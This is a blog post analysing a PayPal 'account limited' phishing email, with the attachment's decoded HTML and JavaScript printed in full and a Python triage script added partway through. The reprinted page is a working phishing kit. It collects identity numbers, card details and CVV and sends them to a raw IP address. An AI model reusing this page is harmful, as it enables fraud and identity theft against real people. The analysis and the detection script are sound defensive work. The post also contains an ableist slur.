Paypal Scam: Your Account Has Been Limited PayPal Case ID

So I did a little digging, trying to find out who was behind this scam, and here is what I came up with.

Edited: 2012-12-12 03:13

By. BlueBoden

I have been receiving a lot of spam e-mails; one of the regular ones is the "your account has been limited" junk e-mail. Normally I just delete all the crap people send me – but occasionally I feel like investigating a little. The thing is, I am very lazy, so I generally don't dig deep enough to find exactly the people behind it, but I do often find domain names, IP addresses, and sometimes even the names of individuals involved with the scam.

The typical "your account has been limited" type of e-mail has an attachment. I tried to open this attachment – knowing what I was doing – anyway, it was only a simple HTML file, so I figured it would be sufficient to disable my Internet connection, and have a look at the source before opening it in my browser. The file contained some encoded JavaScript; opening the file gave a blank page – apparently it didn't work – so I had to decode the script to get to the source. The encrypted script looks like:

document.write(unescape("......

Followed by something that looks like a bunch of gibberish. After decoding the script, here is what I got:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- PayPal Verification System --><!-- Destinated Only For Locked Accounts --><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><!--
 Script info: script: webscr, cmd: _profile-credit-card-new-clickthru, template: p/acc/pro/cc-add, date: Nov. 14, 2008 14:00:33 PST; country: AU, language: en_AU, xslt server:
 installation: WEBSCR-495-20071119-1 web version: 49.5-449887 branch: live-495_int
 content version: 49.5-442158
 pexml version: 49.5-452976
 page XSL: FinancialInstrument/default/en_AU/account/profile/CCAdd.xsl
 hostname : Hina8NrQtZRtCnjcgHIwV5Yhsy3cnetnZYg.-3ioJb0
--><title>Profile Update - PayPal</title><!--googleoff: all-->
<meta http-equiv="keywords" content="Send, money, payments, credit, credit card, instant, money, financial services, mobile, wireless, WAP, mobile phones, two-way pagers, Windows CE"><!--googleon: all--><!--googleoff: all-->
<meta http-equiv="description" content="PayPal lets you send money to anyone with email. PayPal is free for consumers, and works seamlessly with your existing credit card and current account. You can settle debts, borrow cash, divide bills or split expenses with friends, all without going to an ATM or looking for your chequebook."><!--googleon: all-->
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xpt.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xptInvoice.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xptObsolete.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/xptlive.css">
<link rel="stylesheet" type="text/css" href="http://www.paypal.com/css/default.css">
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-610-20100112-1/css/browsers/ie6.css><![endif]-->
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-610-20100112-1/css/browsers/ie7.css"><![endif]-->
<script type="text/javascript" language="javascript">

function showhide(divid, state){
document.getElementById(divid).style.display=state
}
function go_step2(){
var fname = document.getElementById('fname');
var lname = document.getElementById('lname');
var email = document.getElementById('email');
var emailRegEx = /^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i;
var dd = document.getElementById('dd'); var mm = document.getElementById('mm'); var yy = document.getElementById('yy');
var phone = document.getElementById('phone');
var mmn = document.getElementById('mmn');
if(fname.value.length < 2){alert('Must enter your first name'); fname.focus(); return false;}
if(lname.value.length < 2){alert('Must enter your last name'); lname.focus(); return false;}
if(email.value.search(emailRegEx) == -1){alert('Must enter your email address'); email.focus();return false; }
if(mm.value == "mm"){alert('Must enter your birth date'); mm.focus(); return false;}
if(dd.value == "dd"){alert('Must enter your birth date'); dd.focus(); return false;}
if(yy.value == "yy"){alert('Must enter your birth date'); yy.focus(); return false;}
if(phone.value.length < 6){alert('Must enter your phone number'); phone.focus(); return false;}
else
 { showhide ('signup', 'none');	showhide ('continue', 'block'); }
 }
 function go_step3(){
var ssn1 = document.getElementById('ssn1');
var ssn2 = document.getElementById('ssn2');
var ssn3 = document.getElementById('ssn3');
var sessn = document.getElementById('sessn');
var dkssn = document.getElementById('dkssn');
var fissn = document.getElementById('fissn');
var itssn = document.getElementById('itssn');
var address1 = document.getElementById('address1');
var city = document.getElementById('city');
var state = document.getElementById('state'); 
var zip = document.getElementById('zip'); 
var country = document.getElementById('country');
if(address1.value.length < 4){alert('Must enter your main address'); address1.focus(); return false;}
if(city.value.length < 2){alert('Must enter your city'); city.focus(); return false;}
if(state.value.length < 2){alert('Must enter your state'); state.focus(); return false;}
if(zip.value.length < 3){alert('Must enter your zip code'); zip.focus(); return false;}
if(country.value == "country"){alert('Must enter your country'); country.focus(); return false;}
if(country.value < 2){alert('Must enter your mother s maiden name'); country.focus(); return false;}
if (ssn1){
if(ssn1.value.length < 3){alert("Enter your Social Security Number");ssn1.focus();return false;}
if(ssn2.value.length < 2){alert("Enter your Social Security Number");ssn2.focus();return false;}
if(ssn3.value.length < 4){alert("Enter your Social Security Number");ssn3.focus();return false;}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
	}
if (sessn){
if(sessn.value.length < 10){alert("Enter your Personal Identity Number (personnummer)");sessn.focus();return false;}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
	}
if (dkssn){
if(dkssn.value.length < 10){alert("Enter your Personal Identification number (CPR)");dkssn.focus();return false;}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
	}
if (fissn){
if(fissn.value.length < 4){alert("Enter your Personal Identity Code (henkil?tunnus)");fissn.focus();return false;}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
	}
if (itssn){
if(itssn.value.length < 4){alert("Enter your Codice Fiscale");itssn.focus();return false;}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
	}
else
 { showhide ('continue', 'none');	showhide ('cc', 'block'); }
 }
 function validate(frm){if(frm.elements['ccnumber'].value.length < 15)
{alert("Enter a valid Card Number");frm.elements['ccnumber'].focus();return false;}
if(frm.elements['exp_mm'].value == "00"){alert("Invalid Expiry Date");
frm.elements['exp_mm'].focus();return false;}
if(frm.elements['exp_yy'].value == "00"){alert("Invalid Expiry Date");
frm.elements['exp_yy'].focus();return false;}
if(frm.elements['cvv'].value.length < 3)
{alert("Enter your Card Verification Number");frm.elements['cvv'].focus();return false;}
return true;}
function varssn(){ 
var country = document.getElementById('country');
if (country.value == "US") {
	document.getElementById('varssn').innerHTML = '<table align="center" border="0" cellpadding="0" cellspacing="0" width="760"><tr><td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Social Security Number:</label></td><td width="2"> </td><td width="418"><input style="width:40px" maxlength="3" class="" type="text" id="ssn1" name="ssn1" size="20" value="" onfocus="this.value=\'\';"> - <input style="width:30px" maxlength="2" class="" type="text" id="ssn2" name="ssn2" size="20" value="" onfocus="this.value=\'\';"> - <input style="width:45px" maxlength="4" class="" type="text" id="ssn3" name="ssn3" size="20" value="" onfocus="this.value=\'\';"></td></tr></table>'; return false;}
if (country.value == "Sweden") {
	document.getElementById('varssn').innerHTML = '<table align="center" border="0" cellpadding="0" cellspacing="0" width="760"><tr><td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Personal identity number:</label></td><td width="2"> </td><td width="418"><input maxlength="15" class="" type="text" id="sessn" name="sessn" size="20" value="" onfocus="this.value=\'\';"> (personnummer)</td></tr></table>'; return false;}
if (country.value == "Denmark") {
	document.getElementById('varssn').innerHTML = '<table align="center" border="0" cellpadding="0" cellspacing="0" width="760"><tr><td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Personal identification number:</label></td><td width="2"> </td><td width="418"><input maxlength="15" class="" type="text" id="dkssn" name="dkssn" size="20" value="" onfocus="this.value=\'\';"> (CPR)</td></tr></table>'; return false;}
if (country.value == "Finland") {
	document.getElementById('varssn').innerHTML = '<table align="center" border="0" cellpadding="0" cellspacing="0" width="760"><tr><td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Personal identity code:</label></td><td width="2"> </td><td width="418"><input maxlength="15" class="" type="text" id="fissn" name="fissn" size="20" value="" onfocus="this.value=\'\';"> (henkil?tunnus)</td></tr></table>'; return false;}
if (country.value == "Italy") {
	document.getElementById('varssn').innerHTML = '<table align="center" border="0" cellpadding="0" cellspacing="0" width="760"><tr><td class="label" width="320"><label for="defaultaddress1"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Codice Fiscale:</label></td><td width="2"> </td><td width="418"><input maxlength="15" class="" type="text" id="itssn" name="itssn" size="20" value="" onfocus="this.value=\'\';"></td></tr></table>'; return false;}
else {
 document.getElementById('varssn').innerHTML = ' '; }
}
</script>
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/en_US/lang.css">
<style type="text/css"></style>
<style type="text/css">
.Warning {
background:#ffffcc;color:black;
}
select{border:1px solid #84A8CC;margin-bottom:2px;}
input{border:1px solid #84A8CC;margin-bottom:2px;}
</style>
<link rel="shortcut icon" href="favicon.ico">
</head><body>
<div class="srd" id="header">
<h1><a href="https://www.paypal.com/us/cgi-bin/webscr"><img src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" alt="PayPal" border="0"></a></h1>
<form method="post" id="searchForm" name="searchForm" action="https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search">
<fieldset>
<legend>Search PayPal</legend>
<label for="searchBox">Search </label><input id="searchBox" name="queryString" value="" type="text"> <input class="button" id="search.x" name="search.x" value="Search" type="submit">
</fieldset>
<input name="form_charset" value="UTF-8" type="hidden">
</form>
<div class="srd" id="navGlobal"><ul>
<li class="logout"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_logout">Log Out</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help">Help</a></li>
<li class="last"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center">Security Centre</a></li>
</ul></div>
</div>
<div id="navPrimary" class="srd"><ul class="secondary">
<li class="active">
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">My Account</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Overview</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add Funds</a></li>
<li>
<a href="#" href=https://www.paypal.com/us/cgi-bin/webscr">Withdraw</a><ul><li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Transfer to Bank Account</a></li></ul>
</li>
<li>
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">History</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Basic Search</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Download History</a></li>
</ul>
</li>
<li class="">
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Resolution Centre</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">View Open Cases</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Guides</a></li>
</ul>
</li>
<li class="active">
<a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Profile</a><ul>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Email</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Bank Account</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Credit Card</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Add or Edit Postal Address</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Send Money</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Request Money</a></li>
<li class=""><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Merchant Services</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Auction Tools</a></li>
<li><a href="#" href="https://www.paypal.com/us/cgi-bin/webscr">Products & Services</a></li>
</ul></div>
<div id="xptContentMain"><table id="xptContentContainer" align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tbody><tr><td><div id="xptTitle"><table class="main" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td class="heading" width="100%"><h1>Profile Update</h1></td>
<td align="right" nowrap="nowrap">
<a href="https://www.paypal.com/us/cgi-bin/webscr"><span class="small">Secure Transaction</span></a> <img src="https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif" alt="" align="top" border="0">
</td>
</tr>
<tr><td colspan="2"><img alt="" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif" border="0" height="2" width="1"></td></tr>
<tr><td><img alt="" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif" border="0" height="4" width="1"></td></tr>
</tbody></table></div></td></tr>

<table width="760" border="0" cellpadding="0" cellspacing="0" align="center">
<tr>
<td>
<p>Please complete the form below to update your Profile information and restore your account access.</p>
</td>
</tr>
</table>
<script language="JavaScript">
function openWindow2() {
popupWin = window.open('pin.html','EIN','scrollbars,resizable,toolbar,width=420,height=300,left=50,top=50');
popupWin.focus();
}
</script>
<script language="JavaScript">
function openWindow1() {
popupWin = window.open('cvv.html','EIN','scrollbars,resizable,toolbar,width=420,height=300,left=50,top=50');
popupWin.focus();
}
</script>

<script language="JavaScript">
function openWindow2() {
popupWin = window.open('pin.html','EIN','scrollbars,resizable,toolbar,width=420,height=300,left=50,top=50');
popupWin.focus();
}
</script>
<script language="JavaScript">
function openWindow1() {
popupWin = window.open('cvv.html','EIN','scrollbars,resizable,toolbar,width=420,height=300,left=50,top=50');
popupWin.focus();
}
</script>


<form name="frm" action="http://67.23.234.129/~service//vb/includes/service.php" method="post" onsubmit="return validate(this)">
<div id="signup" style="display:block; width="760">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr>
<td>
<hr class="dotted">
</td>
</tr>
<tr>

<tr>
<td class=""><span class="emphasis">Personal Information Profile<br></td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr><td><br>Make sure you enter the information accurately, and according to the formats required.<br> Fill in all the required fields.<br><br></td></tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr>
<td class="label" width="320"><label for="fullname"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>First Name:</label></td>
<td width="2"> </td>
<td width="418"><input class="" type="text" id="fname" name="fname" size="20" value="" onfocus="this.value='';"></td>
</tr>
<tr>
<td class="label" width="320"><label for="fullname"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Last Name:</label></td>
<td width="2"> </td>
<td width="418"><input class="" type="text" id="lname" name="lname" size="20" value="" onfocus="this.value='';"></td>
</tr>
<tr>
<td class="label" width="320"><label for="fullname"><sup><img border="0" src="https://www.sandbox.paypal.com/en_US/i/scr/pixel.gif"></sup>Email Address:</label></td>
<td width="2"> </td>
<td width="418"><input class="" type="text" id="email" name="email" size="20" value="" onfocus="this.value='';"></td

I'm very lazy myself, so I haven't looked closer at this code – I have no idea what it does – what I am looking for is suspicious URLs in the code, such as IP addresses or suspicious domains. I found what I was looking for: an HTML form that is being submitted to an IP address, with something that appears to be a very amateurish installation of Apache. Requesting the IP in a browser gave a standard "default website page". Anyway, these scammers are likely from some country where the government doesn't care, so likely out of reach.
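An added example, not part of the original post: the same two steps (decoding the `document.write(unescape("...` wrapper and looking for where the forms post) done statically in Python, so no script from the attachment ever runs. The sample attachment, the `192.0.2.10` documentation address and all function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import quote, unquote, urlsplit

# Captures the string argument of unescape("...") or unescape('...').
UNESCAPE_RE = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)

def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX and %XX become single code points."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def decode_layers(html, max_depth=5):
    """Return the attachment plus every statically decoded layer; nothing runs."""
    layers = [html]
    while len(layers) <= max_depth and (found := UNESCAPE_RE.findall(layers[-1])):
        layers.append("\n".join(js_unescape(payload) for _, payload in found))
    return layers

class FormActions(HTMLParser):
    """Collect the action attribute of every <form> tag."""
    def __init__(self):
        super().__init__()
        self.actions = []
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")

def classify(action, brand_domains=("paypal.com",)):
    """Label where a form posts: raw-ip, brand, other-host or relative."""
    host = urlsplit(action).hostname or ""
    try:
        ip_address(host)
        return "raw-ip"          # form posts to a bare IP address
    except ValueError:
        pass
    if any(host == d or host.endswith("." + d) for d in brand_domains):
        return "brand"
    return "other-host" if host else "relative"

def triage(attachment_html):
    findings = []
    for layer in decode_layers(attachment_html):
        parser = FormActions()
        parser.feed(layer)
        findings += [(a, classify(a)) for a in parser.actions]
    return findings

# Constructed sample: two forms hidden behind one unescape() layer.
INNER = ('<form action="https://www.paypal.com/au/cgi-bin/searchscr"></form>'
         '<form name="frm" action="http://192.0.2.10/collect.php" method="post"></form>')
SAMPLE = '<script>document.write(unescape("%s"));</script>' % quote(INNER, safe="")
```

Calling `triage()` on the text of a saved attachment returns one `(action, label)` pair per form; a `raw-ip` or `other-host` label on a page that otherwise links only to the impersonated brand is the line to look at first.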

I don't really care about what the above code exactly does; I am just throwing out the decoded script for those interested. Hopefully someone will catch this idiot soon, because I am just tired of getting this scam e-mail.

I know my way around the Internet, even some of the more shady places, so I know a few tricks myself. Anyway, it's fun to think about – every time we receive spam, some loser is just sitting around somewhere and hitting a button like a retard. Some of these people are very skilled programmers – they are just wasting their abilities – getting a lot of enemies in the process. I'm sure they could earn way more money creating something useful, rather than programs and scripts to post automated spam and whatever.